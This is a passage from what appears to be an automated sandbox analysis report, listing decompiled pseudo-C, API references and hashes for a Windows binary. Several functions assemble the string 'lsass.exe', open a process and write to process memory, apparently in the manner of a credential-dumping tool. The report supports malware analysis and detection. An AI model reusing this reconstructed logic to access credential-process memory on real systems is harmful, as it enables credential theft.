				E00007FF77FF7CEF2224C(_t195,  *_t57, _t232, _t240, _t240);
				_t233 =  *0xcef30688; // 0x0
				_t58 = _t243 + 7; // 0xdd0d8b480853ff41
				E00007FF77FF7CEF2224C(_t195,  *_t58, _t233, _t240, _t242);
				 *(_t243 + 0x1f) =  *(_t243 + 0x1f) & 0x00000000;
				 *(_t243 + 0x27) =  *(_t243 + 0x27) & 0x00000000;
				_t63 = _t243 + 0x6f; // 0x7ff7cef22560
				_t64 = _t243 - 0x69; // 0x7ff7cef22488
				_t65 = _t243 - 0x59; // 0x7ff7cef22498
				 *(_t243 - 0x59) = _t63;
				_t67 = _t243 + 0x1f; // 0x7ff7cef22510
				r8d = 1;
				 *((long long*)(_t243 - 0x51)) = _t67;
				_t69 = _t243 - 0x11; // 0x48000099a9058d48
				 *(_t243 - 0x11) =  *(_t243 - 0x11) & 0x00000000;
				 *((long long*)(_t243 - 0x69)) =  *_t69 + 1;
				_t185 =  *0xcef30688; // 0x0
				 *(_t243 - 0x61) = _t185;
				if (E00007FF77FF7CEF21170(_t195, _t65, _t64, _t250) == 0) goto 0xcef239dd;
				 *((long long*)(_t243 - 0x69)) =  *((long long*)(_t243 - 0x69)) - 1;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				 *_t185();
				 *(_t243 - 0x59) = _t185;
				if (_t185 == 0) goto 0xcef239dd;
				_t80 = _t243 - 0x69; // 0x7ff7cef22488
				_t81 = _t243 - 0x59; // 0x7ff7cef22498
				r8d = 8 + _t185 * 4;
				 *(_t243 - 0x11) = _t185;
				E00007FF77FF7CEF21170(_t195, _t81, _t80, _t250);
				_t83 = _t243 - 0x49; // 0x7ff7cef224a8
				E00007FF77FF7CEF23AE8(_t195, _t83, _t256, _t240, _t243);
				_t84 = _t243 - 0x31; // 0x9b50058d4800
				if ( *((intOrPtr*)( *_t84 + 8)) == 0) goto 0xcef239fe;
				LocalFree(??);
				_t86 = _t243 - 0x29; // 0x244c8d48c1420f48
				if ( *((intOrPtr*)( *_t86 + 8)) == 0) goto 0xcef23a11;
				LocalFree(??);
				_t88 = _t243 + 7; // 0xdd0d8b480853ff41
				if ( *((intOrPtr*)( *_t88 + 8)) == 0) goto 0xcef23a24;
				LocalFree(??);
				_t90 = _t243 - 0x11; // 0x48000099a9058d48
				if ( *_t90 == 0) goto 0xcef23a33;
				LocalFree(??);
				_t91 = _t243 - 0x79; // 0x45158d480000e654
				_t219 =  *((intOrPtr*)( *_t91));
				 *(_t246 + 0x20) = _t219;
				if (_t219 !=  *(_t246 + 0x30)) goto 0xcef23887;
				LocalFree(??);
				_t95 = _t243 + 0x77; // 0x7af815ff0000
				if (1 -  *_t95 < 0) goto 0xcef23803;
				_t96 = _t243 + 0x7f; // 0x48000096b9158d48
				r12d =  *_t96;
				return r12d;
			}

0x7ff7cef236d8
0x7ff7cef236d8
0x7ff7cef236e4
0x7ff7cef236e9
0x7ff7cef236f0
0x7ff7cef236f5
0x7ff7cef236f9
0x7ff7cef236fc
0x7ff7cef23708
0x7ff7cef2370f
0x7ff7cef23714
0x7ff7cef2371d
0x7ff7cef23722
0x7ff7cef23725
0x7ff7cef2372a
0x7ff7cef23737
0x7ff7cef2373b
0x7ff7cef23742
0x7ff7cef23746
0x7ff7cef23751
0x7ff7cef2375a
0x7ff7cef23761
0x7ff7cef2376a
0x7ff7cef23771
0x7ff7cef2377a
0x7ff7cef23781
0x7ff7cef2378a
0x7ff7cef2379f
0x7ff7cef237ad
0x7ff7cef237b9
0x7ff7cef237bb
0x7ff7cef237bf
0x7ff7cef237c6
0x7ff7cef237cb
0x7ff7cef237d2
0x7ff7cef237da
0x7ff7cef237e6
0x7ff7cef237ec
0x7ff7cef237f6
0x7ff7cef2380c
0x7ff7cef2381c
0x7ff7cef23821
0x7ff7cef23821
0x7ff7cef23825
0x7ff7cef2382a
0x7ff7cef2383a
0x7ff7cef23848
0x7ff7cef2384a
0x7ff7cef23851
0x7ff7cef23861
0x7ff7cef2386e
0x7ff7cef23874
0x7ff7cef2387d
0x7ff7cef23882
0x7ff7cef23889
0x7ff7cef23897
0x7ff7cef23897
0x7ff7cef238a2
0x7ff7cef238a8
0x7ff7cef238a8
0x7ff7cef238af
0x7ff7cef238b2
0x7ff7cef238c0
0x7ff7cef238ca
0x7ff7cef238cd
0x7ff7cef238d3
0x7ff7cef238dd
0x7ff7cef238e8
0x7ff7cef238f3
0x7ff7cef238fe
0x7ff7cef23909
0x7ff7cef2390d
0x7ff7cef23917
0x7ff7cef2391b
0x7ff7cef23920
0x7ff7cef23927
0x7ff7cef2392b
0x7ff7cef23930
0x7ff7cef23937
0x7ff7cef2393b
0x7ff7cef23940
0x7ff7cef23944
0x7ff7cef23949
0x7ff7cef2394d
0x7ff7cef23951
0x7ff7cef23955
0x7ff7cef23959
0x7ff7cef2395d
0x7ff7cef23963
0x7ff7cef23967
0x7ff7cef2396b
0x7ff7cef23973
0x7ff7cef23977
0x7ff7cef2397e
0x7ff7cef23989
0x7ff7cef2398f
0x7ff7cef239a1
0x7ff7cef239b1
0x7ff7cef239be
0x7ff7cef239c0
0x7ff7cef239c7
0x7ff7cef239c9
0x7ff7cef239cd
0x7ff7cef239d1
0x7ff7cef239d4
0x7ff7cef239d8
0x7ff7cef239dd
0x7ff7cef239e4
0x7ff7cef239e9
0x7ff7cef239f6
0x7ff7cef239f8
0x7ff7cef239fe
0x7ff7cef23a09
0x7ff7cef23a0b
0x7ff7cef23a11
0x7ff7cef23a1c
0x7ff7cef23a1e
0x7ff7cef23a24
0x7ff7cef23a2b
0x7ff7cef23a2d
0x7ff7cef23a33
0x7ff7cef23a37
0x7ff7cef23a3a
0x7ff7cef23a44
0x7ff7cef23a4e
0x7ff7cef23a56
0x7ff7cef23a59
0x7ff7cef23a5f
0x7ff7cef23a5f
0x7ff7cef23a7c

APIs

Part of subcall function 00007FF7CEF2326C: CreateFileW.KERNEL32 ref: 00007FF7CEF2331A

GetModuleHandleW.KERNEL32 ref: 00007FF7CEF2382A
GetProcAddress.KERNEL32 ref: 00007FF7CEF2383A
LocalFree.KERNEL32 ref: 00007FF7CEF23A4E

Part of subcall function 00007FF7CEF21170: SetFilePointer.KERNEL32 ref: 00007FF7CEF211D9
Part of subcall function 00007FF7CEF21170: GetModuleHandleW.KERNEL32 ref: 00007FF7CEF211F6
Part of subcall function 00007FF7CEF21170: GetProcAddress.KERNEL32 ref: 00007FF7CEF21206

Part of subcall function 00007FF7CEF2224C: GetModuleHandleW.KERNEL32 ref: 00007FF7CEF2229B
Part of subcall function 00007FF7CEF2224C: GetProcAddress.KERNEL32 ref: 00007FF7CEF222AB

Part of subcall function 00007FF7CEF21170: WriteProcessMemory.KERNEL32 ref: 00007FF7CEF21248
Part of subcall function 00007FF7CEF21170: GetModuleHandleW.KERNEL32 ref: 00007FF7CEF21257
Part of subcall function 00007FF7CEF21170: GetProcAddress.KERNEL32 ref: 00007FF7CEF21267
Part of subcall function 00007FF7CEF21170: LocalFree.KERNEL32 ref: 00007FF7CEF212B0

GetModuleHandleW.KERNEL32 ref: 00007FF7CEF239A1
GetProcAddress.KERNEL32 ref: 00007FF7CEF239B1

Part of subcall function 00007FF7CEF21170: SetFilePointer.KERNEL32 ref: 00007FF7CEF212E9
Part of subcall function 00007FF7CEF21170: GetModuleHandleW.KERNEL32 ref: 00007FF7CEF21303
Part of subcall function 00007FF7CEF21170: GetProcAddress.KERNEL32 ref: 00007FF7CEF21313

LocalFree.KERNEL32 ref: 00007FF7CEF239F8
LocalFree.KERNEL32 ref: 00007FF7CEF23A0B
LocalFree.KERNEL32 ref: 00007FF7CEF23A1E
LocalFree.KERNEL32 ref: 00007FF7CEF23A2D

Strings

LocalAlloc, xrefs: 00007FF7CEF23830, 00007FF7CEF239A7
kernel32, xrefs: 00007FF7CEF23805, 00007FF7CEF23993

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLocalModuleProc$File$Pointer$CreateMemoryProcessWrite
String ID: LocalAlloc$kernel32
API String ID: 2588141871-3502785670
Opcode ID: ff52a427bf4d7faa984fc2a906d94663f66b57d29589e4babc107cc92fa9e624
Instruction ID: c87f7b583597015ee5ad30f127030c90c77b7334375b961e559e3547b4ec9e63
Opcode Fuzzy Hash: ff52a427bf4d7faa984fc2a906d94663f66b57d29589e4babc107cc92fa9e624
Instruction Fuzzy Hash: F1B12A76B09B068AEB94EF64E4402ACB3A5FB88768F900036DE4D67758DF3CE505C764

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF22348 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 70
memorysleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7CEF2237C
HeapAlloc.KERNEL32 ref: 00007FF7CEF2238C
InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF7CEF223A6
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF7CEF223C2
CreateFileW.KERNELBASE ref: 00007FF7CEF223F1
GetModuleHandleW.KERNEL32 ref: 00007FF7CEF22407
GetProcAddress.KERNEL32 ref: 00007FF7CEF22417
Sleep.KERNEL32 ref: 00007FF7CEF2242B
WaitNamedPipeW.KERNEL32 ref: 00007FF7CEF2243B

Strings

kernel32, xrefs: 00007FF7CEF22400
GetLastError, xrefs: 00007FF7CEF2240D

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: DescriptorHeapSecurity$AddressAllocCreateDaclFileHandleInitializeModuleNamedPipeProcProcessSleepWait
String ID: GetLastError$kernel32
API String ID: 2144717574-498319287
Opcode ID: 4ab51b74eecba5ece5bb2e860a51bc6d2ff0e4a8fc15db7d61da1898b13bac78
Instruction ID: 02006d1a9caa324a050e5e424a4987f93f0d5999280ae6fb8428bce986c1923f
Opcode Fuzzy Hash: 4ab51b74eecba5ece5bb2e860a51bc6d2ff0e4a8fc15db7d61da1898b13bac78
Instruction Fuzzy Hash: 7B316131A08A4282FB90EF25E414769B3A0FB84B74F954634DA6D5B7E8DF7CD449CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF21F84 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 31%

			E00007FF77FF7CEF21F84(void* __edx, long long __rbx, intOrPtr* __rcx, long long __rdi, signed int __rsi) {
				void* _t45;
				void* _t54;
				void* _t58;
				void* _t77;
				signed int _t82;
				signed int _t83;
				long long _t84;
				intOrPtr* _t105;
				signed int _t107;
				WCHAR* _t109;
				void* _t110;
				void* _t112;
				long long _t115;

				_t107 = __rsi;
				_t84 = __rbx;
				_t77 = _t112;
				 *((long long*)(_t77 + 0x10)) = __rbx;
				 *((long long*)(_t77 + 0x18)) = __rsi;
				 *((long long*)(_t77 + 0x20)) = __rdi;
				_t110 = _t77 - 0x5f;
				_t105 = __rcx;
				 *(_t110 - 9) =  *(_t110 - 9) & __rsi;
				 *(_t110 + 7) =  *(_t110 + 7) & __rsi;
				 *(_t110 - 0x19) = _t110 + 0x17;
				_t11 = _t107 + 0x40; // 0x40
				r8d = _t11;
				 *((long long*)(_t110 - 0x11)) = 0xcef30618;
				 *((long long*)(_t110 - 1)) = 0xcef30618;
				 *((long long*)(_t110 + 0xf)) =  *((intOrPtr*)(__rcx + 8));
				_t45 = E00007FF77FF7CEF21170(__rbx, _t110 - 0x19, __rcx, _t115); // executed
				if (_t45 == 0) goto 0xcef220d1;
				if ( *((intOrPtr*)(_t110 + 0x17)) != 0x5a4d) goto 0xcef220d1;
				_t82 =  *((intOrPtr*)(_t110 + 0x53)) +  *_t105;
				 *(_t110 + 7) = _t82;
				GetModuleHandleW(_t109);
				GetProcAddress(??, ??);
				_t20 = _t107 + 0x18; // 0x18
				 *_t82();
				 *(_t110 - 0x19) = _t82;
				if (_t82 == 0) goto 0xcef220d1;
				r8d = _t20; // executed
				E00007FF77FF7CEF21170(_t84, _t110 - 0x19, _t110 + 7, _t115); // executed
				_t83 =  *(_t110 - 0x19);
				_t26 = _t84 + 0x44; // 0x14c
				r11d = _t26;
				_t27 = _t84 - 0x10; // 0xf8
				r9d = _t27;
				_t61 =  ==  ? r9d : 0x108;
				GetModuleHandleW(??);
				GetProcAddress(??, ??);
				 *_t83();
				 *(_t110 - 9) = _t83;
				if (_t83 == 0) goto 0xcef220ae;
				r8d =  ==  ? r9d : 0x108; // executed
				_t54 = E00007FF77FF7CEF21170(_t84, _t110 - 9, _t110 + 7, _t115); // executed
				if (_t54 == 0) goto 0xcef220a4;
				goto 0xcef220b2;
				LocalFree(??);
				LocalFree(??);
				if (_t54 == 0) goto 0xcef220d1;
				 *(_t105 + 0x14) =  *( *((intOrPtr*)(_t110 + 0x67)) + 8);
				_t58 = LocalFree(??);
				goto 0xcef220d5;
				 *(_t105 + 0x14) =  *(_t105 + 0x14) & 0x00000000;
				return _t58;
			}

0x7ff7cef21f84
0x7ff7cef21f84
0x7ff7cef21f84
0x7ff7cef21f87
0x7ff7cef21f8b
0x7ff7cef21f8f
0x7ff7cef21f94
0x7ff7cef21fa5
0x7ff7cef21fa8
0x7ff7cef21fac
0x7ff7cef21fb0
0x7ff7cef21fbe
0x7ff7cef21fbe
0x7ff7cef21fc2
0x7ff7cef21fc6
0x7ff7cef21fd2
0x7ff7cef21fd6
0x7ff7cef21fdd
0x7ff7cef21fec
0x7ff7cef21ffd
0x7ff7cef22000
0x7ff7cef22004
0x7ff7cef22014
0x7ff7cef2201a
0x7ff7cef22022
0x7ff7cef22024
0x7ff7cef2202b
0x7ff7cef22039
0x7ff7cef2203c
0x7ff7cef22041
0x7ff7cef2204a
0x7ff7cef2204a
0x7ff7cef2204e
0x7ff7cef2204e
0x7ff7cef2205e
0x7ff7cef22062
0x7ff7cef22072
0x7ff7cef2207d
0x7ff7cef2207f
0x7ff7cef22086
0x7ff7cef22090
0x7ff7cef22093
0x7ff7cef2209c
0x7ff7cef220a2
0x7ff7cef220a8
0x7ff7cef220b6
0x7ff7cef220be
0x7ff7cef220c6
0x7ff7cef220c9
0x7ff7cef220cf
0x7ff7cef220d1
0x7ff7cef220ed

APIs

Part of subcall function 00007FF7CEF21170: SetFilePointer.KERNEL32 ref: 00007FF7CEF211D9
Part of subcall function 00007FF7CEF21170: GetModuleHandleW.KERNEL32 ref: 00007FF7CEF211F6
Part of subcall function 00007FF7CEF21170: GetProcAddress.KERNEL32 ref: 00007FF7CEF21206

GetModuleHandleW.KERNEL32 ref: 00007FF7CEF22004
GetProcAddress.KERNEL32 ref: 00007FF7CEF22014

Part of subcall function 00007FF7CEF21170: WriteProcessMemory.KERNEL32 ref: 00007FF7CEF21248
Part of subcall function 00007FF7CEF21170: GetModuleHandleW.KERNEL32 ref: 00007FF7CEF21257
Part of subcall function 00007FF7CEF21170: GetProcAddress.KERNEL32 ref: 00007FF7CEF21267
Part of subcall function 00007FF7CEF21170: LocalFree.KERNEL32 ref: 00007FF7CEF212B0

GetModuleHandleW.KERNEL32 ref: 00007FF7CEF22062
GetProcAddress.KERNEL32 ref: 00007FF7CEF22072
LocalFree.KERNEL32 ref: 00007FF7CEF220A8
LocalFree.KERNEL32 ref: 00007FF7CEF220B6
LocalFree.KERNEL32 ref: 00007FF7CEF220C9

Part of subcall function 00007FF7CEF21170: SetFilePointer.KERNEL32 ref: 00007FF7CEF212E9
Part of subcall function 00007FF7CEF21170: GetModuleHandleW.KERNEL32 ref: 00007FF7CEF21303
Part of subcall function 00007FF7CEF21170: GetProcAddress.KERNEL32 ref: 00007FF7CEF21313

Strings

LocalAlloc, xrefs: 00007FF7CEF2200A, 00007FF7CEF22068
kernel32, xrefs: 00007FF7CEF21FF6, 00007FF7CEF22052

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc$FreeLocal$FilePointer$MemoryProcessWrite
String ID: LocalAlloc$kernel32
API String ID: 3806729184-3502785670
Opcode ID: 7e10f62cf0ceab0a247abe0a49262679ca8fba5d86696112e243d33c207d7ff0
Instruction ID: b597310b63e838112ebcf2866e67e3e3e3d4126cac28a8b062e71d050e6aaf87
Opcode Fuzzy Hash: 7e10f62cf0ceab0a247abe0a49262679ca8fba5d86696112e243d33c207d7ff0
Instruction Fuzzy Hash: F6412E32B05B069AEB50EF61D4405ACB374FB88B58B844435CE4D67B59EF38EA59C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF243C4 Relevance: 15.1, APIs: 10, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00007FF77FF7CEF243C4(long long __rbx, signed int _a8, long long _a16) {
				intOrPtr _v24;
				void* __rdi;
				void* _t15;
				void* _t18;
				void* _t22;
				void* _t27;
				void* _t28;
				void* _t30;
				intOrPtr _t32;
				void* _t34;
				signed int _t40;
				intOrPtr _t51;
				void* _t54;
				void* _t55;
				long long _t74;
				void* _t78;
				intOrPtr _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t86;
				long long _t87;
				void* _t88;

				_t75 = __rbx;
				_a16 = __rbx;
				if ( *0x7FF7CEF20000 == 0x5a4d) goto 0xcef243e0;
				goto 0xcef24418;
				_t74 =  *0x7FF7CEF2003C + 0x7ff7cef20000;
				if ( *_t74 != 0x4550) goto 0xcef243dc;
				if ( *((intOrPtr*)(_t74 + 0x18)) != 0x20b) goto 0xcef243dc;
				if ( *((intOrPtr*)(_t74 + 0x84)) - 0xe <= 0) goto 0xcef24418;
				_t40 = 0 |  *((intOrPtr*)(_t74 + 0xf8)) != 0x00000000;
				_a8 = _t40;
				_t15 = E00007FF77FF7CEF26A00(_t74); // executed
				if (_t15 != 0) goto 0xcef24447;
				if ( *0xcef2f510 == 2) goto 0xcef24433;
				E00007FF77FF7CEF25E60();
				E00007FF77FF7CEF25C00(0x1c,  *0xcef2f510 - 2, __rbx, _t81, _t82);
				E00007FF77FF7CEF25850(); // executed
				_t18 = E00007FF77FF7CEF253DC(_t74); // executed
				if (_t18 != 0) goto 0xcef24472;
				if ( *0xcef2f510 == 2) goto 0xcef2445e;
				E00007FF77FF7CEF25E60();
				E00007FF77FF7CEF25C00(0x10,  *0xcef2f510 - 2, _t75, _t81, _t82);
				E00007FF77FF7CEF25850();
				E00007FF77FF7CEF26990(_t75);
				_t22 = E00007FF77FF7CEF266BC(_t74, _t75, _t78, _t80); // executed
				if (_t22 >= 0) goto 0xcef2448b;
				E00007FF77FF7CEF25BAC(0x1b, _t75, _t86);
				GetCommandLineW();
				 *0xcef30918 = _t74; // executed
				E00007FF77FF7CEF26634(_t55, _t74, _t75, _t81, _t82); // executed
				 *0xcef2f508 = _t74;
				if (E00007FF77FF7CEF26544(_t75, _t86) >= 0) goto 0xcef244b7;
				_t27 = E00007FF77FF7CEF25BAC(8, _t75, _t86); // executed
				_t28 = E00007FF77FF7CEF26274(_t27, _t75, _t80, _t81, _t82); // executed
				if (_t28 >= 0) goto 0xcef244ca;
				E00007FF77FF7CEF25BAC(9, _t75, _t86);
				_t30 = E00007FF77FF7CEF25934(1, _t75, _t86); // executed
				if (_t30 == 0) goto 0xcef244df;
				E00007FF77FF7CEF25BAC(_t30, _t75, _t86);
				_t87 =  *0xcef2f570; // 0x2152300
				 *0xcef2f578 = _t87;
				_t79 =  *0xcef2f558; // 0x2152250
				_t51 =  *0xcef2f54c; // 0x2, executed
				_t32 = E00007FF77FF7CEF2245C(_t51, _t54, _t74, _t79, _t88); // executed
				_v24 = _t32;
				if (_t40 != 0) goto 0xcef24510;
				E00007FF77FF7CEF25B74(_t75, _t79, _t87); // executed
				_t34 = E00007FF77FF7CEF25B8C(_t75, _t79, _t87);
				if (_a8 != 0) goto 0xcef24528;
				E00007FF77FF7CEF25B80(_t75, _t79, _t87);
				asm("int3");
				E00007FF77FF7CEF25B9C(_t75, _t87);
				return _t34;
			}

0x7ff7cef243c4
0x7ff7cef243c4
0x7ff7cef243da
0x7ff7cef243de
0x7ff7cef243ee
0x7ff7cef243f7
0x7ff7cef24402
0x7ff7cef2440d
0x7ff7cef24415
0x7ff7cef24418
0x7ff7cef2441c
0x7ff7cef24423
0x7ff7cef2442c
0x7ff7cef2442e
0x7ff7cef24438
0x7ff7cef24442
0x7ff7cef24447
0x7ff7cef2444e
0x7ff7cef24457
0x7ff7cef24459
0x7ff7cef24463
0x7ff7cef2446d
0x7ff7cef24472
0x7ff7cef24478
0x7ff7cef2447f
0x7ff7cef24486
0x7ff7cef2448b
0x7ff7cef24491
0x7ff7cef24498
0x7ff7cef2449d
0x7ff7cef244ab
0x7ff7cef244b2
0x7ff7cef244b7
0x7ff7cef244be
0x7ff7cef244c5
0x7ff7cef244cf
0x7ff7cef244d6
0x7ff7cef244da
0x7ff7cef244df
0x7ff7cef244e6
0x7ff7cef244ed
0x7ff7cef244f4
0x7ff7cef244fa
0x7ff7cef24501
0x7ff7cef24507
0x7ff7cef2450b
0x7ff7cef24510
0x7ff7cef2451e
0x7ff7cef24522
0x7ff7cef24527
0x7ff7cef24528
0x7ff7cef2453a

APIs

_FF_MSGBANNER.LIBCMT ref: 00007FF7CEF2442E
_FF_MSGBANNER.LIBCMT ref: 00007FF7CEF24459
_RTC_Initialize.LIBCMT ref: 00007FF7CEF24472
_amsg_exit.LIBCMT ref: 00007FF7CEF24486
GetCommandLineW.KERNEL32 ref: 00007FF7CEF2448B
__wsetargv.LIBCMT ref: 00007FF7CEF244A4
_amsg_exit.LIBCMT ref: 00007FF7CEF244B2
_amsg_exit.LIBCMT ref: 00007FF7CEF244C5
_cinit.LIBCMT ref: 00007FF7CEF244CF
_amsg_exit.LIBCMT ref: 00007FF7CEF244DA

Memory Dump Source

Source File: 0000001B.00000002.305308506.00007FF7CEF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7CEF20000, based on PE: true

Associated: 0000001B.00000002.305279026.00007FF7CEF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305517849.00007FF7CEF2A000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305601128.00007FF7CEF2E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000001B.00000002.305780374.00007FF7CEF31000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff7cef20000_5753.jbxd

Yara matches

Similarity

API ID: _amsg_exit$CommandInitializeLine__wsetargv_cinit
String ID:
API String ID: 2949660345-0
Opcode ID: 1c5e4fb2d6c217db383d5a7a2bb8b8b182df4c96f6030af45334dbea844a78b7
Instruction ID: 34145323ff20688f3f5cc9bb5f4e1e17ba1b9207ff3d382994cd9c66221113e2
Opcode Fuzzy Hash: 1c5e4fb2d6c217db383d5a7a2bb8b8b182df4c96f6030af45334dbea844a78b7
Instruction Fuzzy Hash: 11316361E0C64386FAD17FB0A4522B9E292AF80375FD14039D94D762D7EFACB8408672

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7CEF2326C Relevance: 13.7, APIs: 9, Instructions: 220
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E00007FF77FF7CEF2326C(signed int __eax, void* __esi, void* __r9, intOrPtr _a8, char _a16, signed int _a24, void* _a32) {
				long long _v64;
				long long _v72;
				char _v80;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char _v120;
				long long _v136;
				long long _v144;
				long long _v152;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t48;
				void* _t50;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t72;
				intOrPtr _t74;
				intOrPtr _t80;
				void* _t91;
				intOrPtr _t112;
				intOrPtr* _t116;
				intOrPtr* _t121;
				short* _t123;
				intOrPtr _t127;
				long long _t128;
				long long _t129;
				intOrPtr _t131;
				void* _t153;
				long long _t156;
				intOrPtr* _t157;
				void* _t158;
				intOrPtr* _t161;
				void* _t163;
				void* _t168;
				void* _t169;
				void* _t170;

				_t168 = __r9;
				_v104 = 0x73006c;
				asm("sbb eax, eax");
				r13d = 0;
				r15d = 0;
				_v100 = 0x730061;
				_v96 = 0x2e0073;
				_v92 = 0x780065;
				_t91 =  *0xcef30688 - _t129; // 0x0
				_v88 = 0x65;
				_a24 = (__eax & 0xfffff400) + 0x00001000 | 0x00000010;
				if (_t91 != 0) goto 0xcef235eb;
				_t121 =  *0xcef30920; // 0x7ff7cef2c018
				_a8 = 0xc0000225;
				_t48 =  *_t121(); // executed
				if (_t48 < 0) goto 0xcef235eb;
				_t131 =  *0xcef306a0; // 0x0
				if (_t131 == 0) goto 0xcef23325;
				_v136 = _t129;
				_t9 = _t129 + 1; // 0x1
				r8d = _t9;
				r9d = 0;
				_v144 = 0;
				_t11 = _t129 + 2; // 0x2
				r12d = _t11;
				_v152 = 3;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				goto 0xcef233ac;
				_v80 =  &_v120;
				_t123 =  &_a16;
				r12d = 1;
				_v72 = _t123;
				_v64 = 0;
				RtlInitUnicodeString(??, ??);
				_a32 = _t129;
				_t50 = E00007FF77FF7CEF21864(_t170 + 4, _t129,  &_a32, _t153, _t158, _t163); // executed
				if (_t50 < 0) goto 0xcef23578;
				goto 0xcef2337e;
				if ( *_a32 == 0) goto 0xcef2338b;
				if (E00007FF77FF7CEF21920(_t129, _a32 + _t123,  &_v80) != 0) goto 0xcef23372;
				LocalFree(??);
				if (_v64 == 0) goto 0xcef23578;
				r8d = _a16;
				OpenProcess(??, ??, ??);
				if (_t123 == 0) goto 0xcef23578;
				if (_t123 == 0xffffffff) goto 0xcef23578;
				if (E00007FF77FF7CEF21000(r12d, _t129, _t123, _a32 + _t123, 0xcef30688, _t163, 0xcef30688) == 0) goto 0xcef23578;
				_t156 =  *0xcef30688; // 0x0
				if (r12d != 2) goto 0xcef23463;
				E00007FF77FF7CEF21624(_t170 + 5,  *((intOrPtr*)( *((intOrPtr*)(_t156 + 8)))), 0xcef30688);
				if (_t123 == 0) goto 0xcef23448;
				_t72 =  *((intOrPtr*)(_t123 + 8));
				r9d =  *0xcef30acc; // 0xa
				 *0xcef30690 = _t72;
				 *0xcef30694 =  *((intOrPtr*)(_t123 + 0xc));
				r8d =  *((intOrPtr*)(_t123 + 0x10));
				 *0xcef30698 = r8d;
				if (_t72 == r9d) goto 0xcef2343e;
				if (r9d - 6 < 0) goto 0xcef2357f;
				if (_t72 - 6 < 0) goto 0xcef2357f;
				r15b =  *_t123 != 9;
				goto 0xcef23489;
				r8d =  *0xcef30698; // 0x2ee
				r15d = 1;
				goto 0xcef23489;
				_t74 =  *0xcef30acc; // 0xa
				_t80 =  *0xcef30ac8; // 0x0
				r8d =  *0xcef30ad0; // 0x2ee
				 *0xcef30690 = _t74;
				 *0xcef30694 = _t80;
				 *0xcef30698 = r8d;
				if (r15d != 0) goto 0xcef2357f;
				 *0xcef30a30 = 0 | r8d - 0x00001f40 >= 0x00000000;
				if (_t74 - 6 >= 0) goto 0xcef234b4;
				 *0xcef309d0 = 0;
				if (_t80 - 2 >= 0) goto 0xcef234be;
				 *0xcef309d0 = 1;
				r8d = 0;
				_t59 = E00007FF77FF7CEF2196C(_t80, _t156, E00007FF77FF7CEF23600, 0xcef30688, _t168); // executed
				if (_t59 < 0) goto 0xcef23578;
				_t112 =  *0xcef2f060; // 0x1
				if (_t112 == 0) goto 0xcef23578;
				asm("movaps xmm0, [0xbb55]");
				asm("movaps xmm1, [0xbb54]");
				_v136 = _t129;
				asm("movups [0xd58a], xmm0");
